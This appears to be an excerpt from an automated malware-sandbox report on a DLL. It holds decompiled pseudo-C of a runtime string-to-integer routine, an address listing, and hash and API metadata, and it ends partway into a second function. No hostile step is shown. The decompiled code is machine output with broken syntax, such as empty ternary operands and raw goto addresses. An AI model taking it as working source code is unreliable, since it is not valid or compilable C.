                                                                                                      				signed short _t200;
                                                                                                      				signed int _t201;
                                                                                                      				signed int _t250;
                                                                                                      				signed int _t252;
                                                                                                      				signed int _t254;
                                                                                                      				signed int _t255;
                                                                                                      				signed int _t258;
                                                                                                      				signed int _t261;
                                                                                                      				signed short* _t380;
                                                                                                      				signed short* _t381;
                                                                                                      				signed short* _t382;
                                                                                                      				signed short* _t384;
                                                                                                      				signed short** _t385;
                                                                                                      				long long _t386;
                                                                                                      				long long* _t389;
                                                                                                      				signed short* _t390;
                                                                                                      				long long* _t394;
                                                                                                      				long long* _t395;
                                                                                                      				long long* _t396;
                                                                                                      				signed short** _t397;
                                                                                                      				void* _t398;
                                                                                                      				void* _t399;
                                                                                                      				signed short* _t404;
                                                                                                      				signed short* _t405;
                                                                                                      				long long _t406;
                                                                                                      				signed short* _t407;
                                                                                                      				long long _t408;
                                                                                                      				intOrPtr _t409;
                                                                                                      
                                                                                                      				_t403 = __r8;
                                                                                                      				_t394 = __rdx;
                                                                                                      				_t386 = __rbx;
                                                                                                      				_a24 = __rbx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				_t406 =  *((intOrPtr*)(__rdx));
                                                                                                      				r13d = 0;
                                                                                                      				_t255 = r9b & 0xffffffff;
                                                                                                      				r14d = r8d;
                                                                                                      				_v64 = _t406;
                                                                                                      				_t397 = __rdx;
                                                                                                      				if (_t406 != 0) goto 0x7c108987;
                                                                                                      				E00007FF87FF87C10B420(__rax);
                                                                                                      				 *__rax = 0x16;
                                                                                                      				E00007FF87FF87C109744();
                                                                                                      				goto 0x7c1089b9;
                                                                                                      				if (r14d == 0) goto 0x7c1089d1;
                                                                                                      				_t4 = _t403 - 2; // -2
                                                                                                      				if (_t4 - 0x22 <= 0) goto 0x7c1089d1;
                                                                                                      				_v160 = __rcx;
                                                                                                      				r9d = 0;
                                                                                                      				 *((char*)(__rcx + 0x30)) = 1;
                                                                                                      				r8d = 0;
                                                                                                      				 *(__rcx + 0x2c) = 0x16;
                                                                                                      				_v168 = _t408;
                                                                                                      				E00007FF87FF87C109674(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
                                                                                                      				_t389 = _t397[1];
                                                                                                      				if (_t389 == 0) goto 0x7c10901d;
                                                                                                      				 *_t389 =  *_t397;
                                                                                                      				goto 0x7c10901d;
                                                                                                      				 *_t394 = _t406 + 2;
                                                                                                      				_t260 = r13d;
                                                                                                      				if ( *((intOrPtr*)(_t389 + 0x28)) != r13b) goto 0x7c1089fb;
                                                                                                      				0x7c109140();
                                                                                                      				goto 0x7c1089fb;
                                                                                                      				_t378 =  *_t397;
                                                                                                      				 *_t397 =  &(( *_t397)[1]);
                                                                                                      				if (E00007FF87FF87C10B244( *_t378 & 0xffff, 8, _t386, _t389) != 0) goto 0x7c1089ee;
                                                                                                      				_t257 =  !=  ? _t255 : _t255 | 0x00000002;
                                                                                                      				if ((0x0000fffd & _t386 - 0x0000002b) != 0) goto 0x7c108a32;
                                                                                                      				_t380 =  *_t397;
                                                                                                      				_t199 =  *_t380 & 0x0000ffff;
                                                                                                      				_t381 =  &(_t380[1]);
                                                                                                      				 *_t397 = _t381;
                                                                                                      				_a16 = 0xa70;
                                                                                                      				_v152 = 0xae6;
                                                                                                      				_v148 = 0xaf0;
                                                                                                      				_v144 = 0xb66;
                                                                                                      				r8d = 0x660;
                                                                                                      				_v140 = 0xb70;
                                                                                                      				_t20 = _t381 - 0x80; // 0x5e0
                                                                                                      				r9d = _t20;
                                                                                                      				_v136 = 0xc66;
                                                                                                      				r10d = 0x6f0;
                                                                                                      				_v132 = 0xc70;
                                                                                                      				r11d = 0x966;
                                                                                                      				_v128 = 0xce6;
                                                                                                      				_v124 = 0xcf0;
                                                                                                      				_v120 = 0xd66;
                                                                                                      				_v116 = 0xd70;
                                                                                                      				_v112 = 0xe50;
                                                                                                      				_v108 = 0xe5a;
                                                                                                      				_v104 = 0xed0;
                                                                                                      				_v100 = 0xeda;
                                                                                                      				_v96 = 0xf20;
                                                                                                      				_v92 = 0xf2a;
                                                                                                      				_v88 = 0x1040;
                                                                                                      				_v84 = 0x104a;
                                                                                                      				_v80 = 0x17e0;
                                                                                                      				_v76 = 0x17ea;
                                                                                                      				_v72 = 0x1810;
                                                                                                      				_v68 = 0xff1a;
                                                                                                      				if ((r14d & 0xffffffef) != 0) goto 0x7c108da0;
                                                                                                      				if (_t199 - 0x30 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - 0x3a >= 0) goto 0x7c108b3e;
                                                                                                      				goto 0x7c108cea;
                                                                                                      				if (_t199 - 0xff10 >= 0) goto 0x7c108cdb;
                                                                                                      				if (_t199 - r8w < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - 0x66a >= 0) goto 0x7c108b66;
                                                                                                      				goto 0x7c108cea;
                                                                                                      				if (_t199 - r10w < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - 0x6fa >= 0) goto 0x7c108b85;
                                                                                                      				goto 0x7c108cea;
                                                                                                      				if (_t199 - r11w < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - 0x970 >= 0) goto 0x7c108ba4;
                                                                                                      				goto 0x7c108cea;
                                                                                                      				if (_t199 - r9w < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - 0x9f0 >= 0) goto 0x7c108bc3;
                                                                                                      				goto 0x7c108cea;
                                                                                                      				if (_t199 - (_t199 & 0x0000ffff) - r9d < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _a16 >= 0) goto 0x7c108be3;
                                                                                                      				goto 0x7c108cea;
                                                                                                      				if (_t199 - _v152 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v148 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v144 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v140 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v136 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v132 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v128 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v124 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v120 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v116 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v112 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v108 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v104 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v100 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v96 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v92 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v88 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v84 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v80 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v76 < 0) goto 0x7c108b34;
                                                                                                      				if ((_t199 & 0x0000ffff) - _v72 - 9 > 0) goto 0x7c108cef;
                                                                                                      				goto 0x7c108b34;
                                                                                                      				if (_t199 - _v68 >= 0) goto 0x7c108cef;
                                                                                                      				if ((_t199 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x7c108d11;
                                                                                                      				_t64 = _t389 - 0x41; // -17
                                                                                                      				_t65 = _t389 - 0x61; // -49
                                                                                                      				_t155 = _t65;
                                                                                                      				if (_t64 - 0x19 <= 0) goto 0x7c108d06;
                                                                                                      				if (_t155 - 0x19 > 0) goto 0x7c108d91;
                                                                                                      				if (_t155 - 0x19 > 0) goto 0x7c108d0e;
                                                                                                      				_t66 = _t389 - 0x37; // -231
                                                                                                      				if (_t66 != 0) goto 0x7c108d91;
                                                                                                      				_t390 =  *_t397;
                                                                                                      				r9d = 0xffdf;
                                                                                                      				_t250 =  *_t390 & 0x0000ffff;
                                                                                                      				_t67 =  &(_t390[1]); // 0xffe1
                                                                                                      				_t404 = _t67;
                                                                                                      				 *_t397 = _t404;
                                                                                                      				_t68 = _t394 - 0x58; // 0x698
                                                                                                      				if ((r9w & _t68) == 0) goto 0x7c108d79;
                                                                                                      				 *_t397 = _t390;
                                                                                                      				_t159 =  !=  ? r14d : 8;
                                                                                                      				r14d =  !=  ? r14d : 8;
                                                                                                      				if (_t250 == 0) goto 0x7c108d71;
                                                                                                      				if ( *_t390 == _t250) goto 0x7c108d71;
                                                                                                      				E00007FF87FF87C10B420(_t381);
                                                                                                      				 *_t381 = 0x16;
                                                                                                      				E00007FF87FF87C109744();
                                                                                                      				r8d = 0x660;
                                                                                                      				r10d = 0x6f0;
                                                                                                      				r11d = 0x966;
                                                                                                      				goto 0x7c108da0;
                                                                                                      				r8d = 0x660;
                                                                                                      				goto 0x7c108da0;
                                                                                                      				_t200 =  *_t404 & 0x0000ffff;
                                                                                                      				_t71 =  &(_t404[1]); // 0xffe3
                                                                                                      				_t382 = _t71;
                                                                                                      				 *_t397 = _t382;
                                                                                                      				r8d = 0x660;
                                                                                                      				goto 0x7c108d96;
                                                                                                      				_t164 =  !=  ? r14d : 0xa;
                                                                                                      				r14d = 0xa;
                                                                                                      				_t165 = ( !=  ? r14d : 0xa) | 0xffffffff;
                                                                                                      				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                                                      				_t252 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                                                      				r12d = 0x30;
                                                                                                      				r15d = 0xff10;
                                                                                                      				r9d = 0xa / r14d;
                                                                                                      				if (_t200 - r12w < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - 0x3a >= 0) goto 0x7c108dd2;
                                                                                                      				goto 0x7c108f6b;
                                                                                                      				if (_t200 - r15w >= 0) goto 0x7c108f5b;
                                                                                                      				if (_t200 - r8w < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - 0x66a >= 0) goto 0x7c108dfb;
                                                                                                      				goto 0x7c108f6b;
                                                                                                      				if (_t200 - r10w < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - 0x6fa >= 0) goto 0x7c108e1a;
                                                                                                      				goto 0x7c108f6b;
                                                                                                      				if (_t200 - r11w < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - 0x970 >= 0) goto 0x7c108e39;
                                                                                                      				goto 0x7c108f6b;
                                                                                                      				if (_t200 - 0x9e6 < 0) goto 0x7c108f70;
                                                                                                      				_t76 =  &(_t382[5]); // 0x9f0
                                                                                                      				if (_t200 - _t76 >= 0) goto 0x7c108e59;
                                                                                                      				goto 0x7c108f6b;
                                                                                                      				if (_t200 - 0xa66 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _a16 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v152 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v148 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v144 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v140 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v136 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v132 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v128 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v124 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v120 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v116 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v112 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v108 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v104 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v100 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v96 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v92 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v88 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v84 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v80 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v76 < 0) goto 0x7c108e4f;
                                                                                                      				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0x7c108f70;
                                                                                                      				goto 0x7c108f6b;
                                                                                                      				if (_t200 - _v68 >= 0) goto 0x7c108f70;
                                                                                                      				if ((_t200 & 0x0000ffff) - r15d != 0xffffffff) goto 0x7c108f93;
                                                                                                      				_t100 = _t390 - 0x41; // -65
                                                                                                      				_t101 = _t390 - 0x61; // -97
                                                                                                      				_t185 = _t101;
                                                                                                      				if (_t100 - 0x19 <= 0) goto 0x7c108f83;
                                                                                                      				if (_t185 - 0x19 > 0) goto 0x7c108f90;
                                                                                                      				if (_t185 - 0x19 > 0) goto 0x7c108f8b;
                                                                                                      				goto 0x7c108f93;
                                                                                                      				_t405 =  *_t397;
                                                                                                      				if (((_t200 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x7c108fd7;
                                                                                                      				_t201 =  *_t405 & 0x0000ffff;
                                                                                                      				_t254 = _t382 + _t390;
                                                                                                      				_t261 = _t254;
                                                                                                      				_t107 =  &(_t405[1]); // 0x2
                                                                                                      				r8d = 0x660;
                                                                                                      				 *_t397 = _t107;
                                                                                                      				_t258 = ( !=  ? _t255 : _t255 | 0x00000002) | (r13d & 0xffffff00 | _t254 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t260 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
                                                                                                      				goto 0x7c108db7;
                                                                                                      				_t409 = _a8;
                                                                                                      				_t109 = _t405 - 2; // -2
                                                                                                      				_t384 = _t109;
                                                                                                      				_t407 = _v64;
                                                                                                      				 *_t397 = _t384;
                                                                                                      				if (_t201 == 0) goto 0x7c109008;
                                                                                                      				if ( *_t384 == _t201) goto 0x7c109008;
                                                                                                      				E00007FF87FF87C10B420(_t384);
                                                                                                      				 *_t384 = 0x16;
                                                                                                      				E00007FF87FF87C109744();
                                                                                                      				if ((sil & 0x00000008) != 0) goto 0x7c109024;
                                                                                                      				_t385 = _t397[1];
                                                                                                      				 *_t397 = _t407;
                                                                                                      				if (_t385 == 0) goto 0x7c10901d;
                                                                                                      				 *_t385 = _t407;
                                                                                                      				goto 0x7c1090a8;
                                                                                                      				r8d = 0x80000000;
                                                                                                      				_t114 = _t405 - 1; // -1
                                                                                                      				r9d = _t114;
                                                                                                      				if ((sil & 0x00000004) != 0) goto 0x7c10904c;
                                                                                                      				if ((sil & 0x00000001) == 0) goto 0x7c10908f;
                                                                                                      				if ((sil & 0x00000002) == 0) goto 0x7c109047;
                                                                                                      				if (_t261 - r8d <= 0) goto 0x7c109095;
                                                                                                      				goto 0x7c10904c;
                                                                                                      				if (_t261 - r9d <= 0) goto 0x7c109097;
                                                                                                      				 *((char*)(_t409 + 0x30)) = 1;
                                                                                                      				 *((intOrPtr*)(_t409 + 0x2c)) = 0x22;
                                                                                                      				if ((_t258 & 0x00000001) != 0) goto 0x7c109067;
                                                                                                      				goto 0x7c109097;
                                                                                                      				_t395 = _t397[1];
                                                                                                      				if ((_t258 & 0x00000002) == 0) goto 0x7c10907f;
                                                                                                      				if (_t395 == 0) goto 0x7c10907a;
                                                                                                      				 *_t395 =  *_t397;
                                                                                                      				goto 0x7c1090a8;
                                                                                                      				if (_t395 == 0) goto 0x7c10908a;
                                                                                                      				 *_t395 =  *_t397;
                                                                                                      				goto 0x7c1090a8;
                                                                                                      				if ((sil & 0x00000002) == 0) goto 0x7c109097;
                                                                                                      				_t396 = _t397[1];
                                                                                                      				if (_t396 == 0) goto 0x7c1090a6;
                                                                                                      				 *_t396 =  *_t397;
                                                                                                      				return  ~(_t261 | 0xffffffff);
                                                                                                      			}





























































                                                                                                      0x7ff87c10893c
                                                                                                      0x7ff87c10893c
                                                                                                      0x7ff87c10893c
                                                                                                      0x7ff87c10893c
                                                                                                      0x7ff87c108941
                                                                                                      0x7ff87c108958
                                                                                                      0x7ff87c10895b
                                                                                                      0x7ff87c10895e
                                                                                                      0x7ff87c108962
                                                                                                      0x7ff87c108965
                                                                                                      0x7ff87c10896d
                                                                                                      0x7ff87c108973
                                                                                                      0x7ff87c108975
                                                                                                      0x7ff87c10897a
                                                                                                      0x7ff87c108980
                                                                                                      0x7ff87c108985
                                                                                                      0x7ff87c10898a
                                                                                                      0x7ff87c10898c
                                                                                                      0x7ff87c108993
                                                                                                      0x7ff87c108995
                                                                                                      0x7ff87c10899a
                                                                                                      0x7ff87c10899d
                                                                                                      0x7ff87c1089a1
                                                                                                      0x7ff87c1089a4
                                                                                                      0x7ff87c1089af
                                                                                                      0x7ff87c1089b4
                                                                                                      0x7ff87c1089b9
                                                                                                      0x7ff87c1089c0
                                                                                                      0x7ff87c1089c9
                                                                                                      0x7ff87c1089cc
                                                                                                      0x7ff87c1089db
                                                                                                      0x7ff87c1089de
                                                                                                      0x7ff87c1089e5
                                                                                                      0x7ff87c1089e7
                                                                                                      0x7ff87c1089ec
                                                                                                      0x7ff87c1089ee
                                                                                                      0x7ff87c1089f8
                                                                                                      0x7ff87c108a0a
                                                                                                      0x7ff87c108a1a
                                                                                                      0x7ff87c108a23
                                                                                                      0x7ff87c108a25
                                                                                                      0x7ff87c108a28
                                                                                                      0x7ff87c108a2b
                                                                                                      0x7ff87c108a2f
                                                                                                      0x7ff87c108a32
                                                                                                      0x7ff87c108a42
                                                                                                      0x7ff87c108a4f
                                                                                                      0x7ff87c108a5c
                                                                                                      0x7ff87c108a64
                                                                                                      0x7ff87c108a6a
                                                                                                      0x7ff87c108a72
                                                                                                      0x7ff87c108a72
                                                                                                      0x7ff87c108a76
                                                                                                      0x7ff87c108a7e
                                                                                                      0x7ff87c108a84
                                                                                                      0x7ff87c108a8c
                                                                                                      0x7ff87c108a92
                                                                                                      0x7ff87c108a9a
                                                                                                      0x7ff87c108aa2
                                                                                                      0x7ff87c108aaa
                                                                                                      0x7ff87c108ab2
                                                                                                      0x7ff87c108aba
                                                                                                      0x7ff87c108ac2
                                                                                                      0x7ff87c108aca
                                                                                                      0x7ff87c108ad2
                                                                                                      0x7ff87c108ada
                                                                                                      0x7ff87c108ae2
                                                                                                      0x7ff87c108aea
                                                                                                      0x7ff87c108af2
                                                                                                      0x7ff87c108afa
                                                                                                      0x7ff87c108b02
                                                                                                      0x7ff87c108b0d
                                                                                                      0x7ff87c108b1f
                                                                                                      0x7ff87c108b28
                                                                                                      0x7ff87c108b32
                                                                                                      0x7ff87c108b39
                                                                                                      0x7ff87c108b41
                                                                                                      0x7ff87c108b4b
                                                                                                      0x7ff87c108b59
                                                                                                      0x7ff87c108b61
                                                                                                      0x7ff87c108b6a
                                                                                                      0x7ff87c108b78
                                                                                                      0x7ff87c108b80
                                                                                                      0x7ff87c108b89
                                                                                                      0x7ff87c108b97
                                                                                                      0x7ff87c108b9f
                                                                                                      0x7ff87c108ba8
                                                                                                      0x7ff87c108bb6
                                                                                                      0x7ff87c108bbe
                                                                                                      0x7ff87c108bc6
                                                                                                      0x7ff87c108bd4
                                                                                                      0x7ff87c108bde
                                                                                                      0x7ff87c108bea
                                                                                                      0x7ff87c108bf5
                                                                                                      0x7ff87c108c02
                                                                                                      0x7ff87c108c0d
                                                                                                      0x7ff87c108c1a
                                                                                                      0x7ff87c108c25
                                                                                                      0x7ff87c108c32
                                                                                                      0x7ff87c108c3d
                                                                                                      0x7ff87c108c4a
                                                                                                      0x7ff87c108c55
                                                                                                      0x7ff87c108c62
                                                                                                      0x7ff87c108c6d
                                                                                                      0x7ff87c108c7a
                                                                                                      0x7ff87c108c81
                                                                                                      0x7ff87c108c8e
                                                                                                      0x7ff87c108c95
                                                                                                      0x7ff87c108ca2
                                                                                                      0x7ff87c108ca9
                                                                                                      0x7ff87c108cb6
                                                                                                      0x7ff87c108cbd
                                                                                                      0x7ff87c108cd4
                                                                                                      0x7ff87c108cd6
                                                                                                      0x7ff87c108ce3
                                                                                                      0x7ff87c108ced
                                                                                                      0x7ff87c108cf2
                                                                                                      0x7ff87c108cf8
                                                                                                      0x7ff87c108cf8
                                                                                                      0x7ff87c108cfb
                                                                                                      0x7ff87c108d00
                                                                                                      0x7ff87c108d09
                                                                                                      0x7ff87c108d0e
                                                                                                      0x7ff87c108d13
                                                                                                      0x7ff87c108d15
                                                                                                      0x7ff87c108d18
                                                                                                      0x7ff87c108d1e
                                                                                                      0x7ff87c108d21
                                                                                                      0x7ff87c108d21
                                                                                                      0x7ff87c108d25
                                                                                                      0x7ff87c108d28
                                                                                                      0x7ff87c108d2f
                                                                                                      0x7ff87c108d34
                                                                                                      0x7ff87c108d3c
                                                                                                      0x7ff87c108d40
                                                                                                      0x7ff87c108d46
                                                                                                      0x7ff87c108d4b
                                                                                                      0x7ff87c108d4d
                                                                                                      0x7ff87c108d52
                                                                                                      0x7ff87c108d58
                                                                                                      0x7ff87c108d5d
                                                                                                      0x7ff87c108d63
                                                                                                      0x7ff87c108d69
                                                                                                      0x7ff87c108d6f
                                                                                                      0x7ff87c108d71
                                                                                                      0x7ff87c108d77
                                                                                                      0x7ff87c108d79
                                                                                                      0x7ff87c108d7d
                                                                                                      0x7ff87c108d7d
                                                                                                      0x7ff87c108d81
                                                                                                      0x7ff87c108d84
                                                                                                      0x7ff87c108d8f
                                                                                                      0x7ff87c108d99
                                                                                                      0x7ff87c108d9d
                                                                                                      0x7ff87c108da2
                                                                                                      0x7ff87c108da5
                                                                                                      0x7ff87c108da5
                                                                                                      0x7ff87c108da8
                                                                                                      0x7ff87c108dae
                                                                                                      0x7ff87c108db4
                                                                                                      0x7ff87c108dbb
                                                                                                      0x7ff87c108dc5
                                                                                                      0x7ff87c108dcd
                                                                                                      0x7ff87c108dd6
                                                                                                      0x7ff87c108de0
                                                                                                      0x7ff87c108dee
                                                                                                      0x7ff87c108df6
                                                                                                      0x7ff87c108dff
                                                                                                      0x7ff87c108e0d
                                                                                                      0x7ff87c108e15
                                                                                                      0x7ff87c108e1e
                                                                                                      0x7ff87c108e2c
                                                                                                      0x7ff87c108e34
                                                                                                      0x7ff87c108e41
                                                                                                      0x7ff87c108e47
                                                                                                      0x7ff87c108e4d
                                                                                                      0x7ff87c108e54
                                                                                                      0x7ff87c108e61
                                                                                                      0x7ff87c108e6f
                                                                                                      0x7ff87c108e78
                                                                                                      0x7ff87c108e83
                                                                                                      0x7ff87c108e8c
                                                                                                      0x7ff87c108e97
                                                                                                      0x7ff87c108ea0
                                                                                                      0x7ff87c108eab
                                                                                                      0x7ff87c108eb4
                                                                                                      0x7ff87c108ebf
                                                                                                      0x7ff87c108ec8
                                                                                                      0x7ff87c108ed3
                                                                                                      0x7ff87c108ee0
                                                                                                      0x7ff87c108eeb
                                                                                                      0x7ff87c108ef8
                                                                                                      0x7ff87c108eff
                                                                                                      0x7ff87c108f0c
                                                                                                      0x7ff87c108f13
                                                                                                      0x7ff87c108f20
                                                                                                      0x7ff87c108f27
                                                                                                      0x7ff87c108f34
                                                                                                      0x7ff87c108f3b
                                                                                                      0x7ff87c108f52
                                                                                                      0x7ff87c108f59
                                                                                                      0x7ff87c108f63
                                                                                                      0x7ff87c108f6e
                                                                                                      0x7ff87c108f73
                                                                                                      0x7ff87c108f79
                                                                                                      0x7ff87c108f79
                                                                                                      0x7ff87c108f7c
                                                                                                      0x7ff87c108f81
                                                                                                      0x7ff87c108f86
                                                                                                      0x7ff87c108f8e
                                                                                                      0x7ff87c108f93
                                                                                                      0x7ff87c108f99
                                                                                                      0x7ff87c108f9b
                                                                                                      0x7ff87c108fa5
                                                                                                      0x7ff87c108fb6
                                                                                                      0x7ff87c108fbd
                                                                                                      0x7ff87c108fc4
                                                                                                      0x7ff87c108fcd
                                                                                                      0x7ff87c108fd0
                                                                                                      0x7ff87c108fd2
                                                                                                      0x7ff87c108fd7
                                                                                                      0x7ff87c108fdf
                                                                                                      0x7ff87c108fdf
                                                                                                      0x7ff87c108fe3
                                                                                                      0x7ff87c108feb
                                                                                                      0x7ff87c108ff1
                                                                                                      0x7ff87c108ff6
                                                                                                      0x7ff87c108ff8
                                                                                                      0x7ff87c108ffd
                                                                                                      0x7ff87c109003
                                                                                                      0x7ff87c10900c
                                                                                                      0x7ff87c10900e
                                                                                                      0x7ff87c109012
                                                                                                      0x7ff87c109018
                                                                                                      0x7ff87c10901a
                                                                                                      0x7ff87c10901f
                                                                                                      0x7ff87c109024
                                                                                                      0x7ff87c10902a
                                                                                                      0x7ff87c10902a
                                                                                                      0x7ff87c109032
                                                                                                      0x7ff87c109038
                                                                                                      0x7ff87c10903e
                                                                                                      0x7ff87c109043
                                                                                                      0x7ff87c109045
                                                                                                      0x7ff87c10904a
                                                                                                      0x7ff87c10904e
                                                                                                      0x7ff87c109056
                                                                                                      0x7ff87c109060
                                                                                                      0x7ff87c109065
                                                                                                      0x7ff87c109067
                                                                                                      0x7ff87c10906d
                                                                                                      0x7ff87c109072
                                                                                                      0x7ff87c109077
                                                                                                      0x7ff87c10907d
                                                                                                      0x7ff87c109082
                                                                                                      0x7ff87c109087
                                                                                                      0x7ff87c10908d
                                                                                                      0x7ff87c109093
                                                                                                      0x7ff87c109097
                                                                                                      0x7ff87c10909e
                                                                                                      0x7ff87c1090a3
                                                                                                      0x7ff87c1090c2

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: -$0$f$p$p
                                                                                                      • API String ID: 3215553584-1865143739
                                                                                                      • Opcode ID: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
                                                                                                      • Instruction ID: fa5508d6b855142f9b24f84ad5cda8d09f48289829516de15649f1c2107bb5cc
                                                                                                      • Opcode Fuzzy Hash: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
                                                                                                      • Instruction Fuzzy Hash: CE12C473E2D14386FB20AA24D1543B97662FB927D4F844136E6A947AC8DF3DE5C0CB20
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                      • String ID:
                                                                                                      • API String ID: 1917832262-0
                                                                                                      • Opcode ID: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
                                                                                                      • Instruction ID: 3e408fd64115808b85e53a0c19587aa684db0046a3c7b51bada71ead8408b8af
                                                                                                      • Opcode Fuzzy Hash: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
                                                                                                      • Instruction Fuzzy Hash: 5D91C976618B408ADB65CB28E05132AF7A5F7C9788F145226DACE97B68DF3CD4498F00
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 77%
                                                                                                      			E00007FF87FF87C10D8F0(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                      				void* _t37;
                                                                                                      				signed long long _t57;
                                                                                                      				intOrPtr _t61;
                                                                                                      				signed long long _t72;
                                                                                                      				void* _t75;
                                                                                                      				signed long long _t76;
                                                                                                      				long long _t82;
                                                                                                      				void* _t86;
                                                                                                      				signed long long _t90;
                                                                                                      				signed long long _t91;
                                                                                                      				WCHAR* _t93;
                                                                                                      				long _t96;
                                                                                                      				void* _t99;
                                                                                                      				WCHAR* _t104;
                                                                                                      
                                                                                                      				 *((long long*)(_t86 + 8)) = __rbx;
                                                                                                      				 *((long long*)(_t86 + 0x10)) = _t82;
                                                                                                      				 *((long long*)(_t86 + 0x18)) = __rsi;
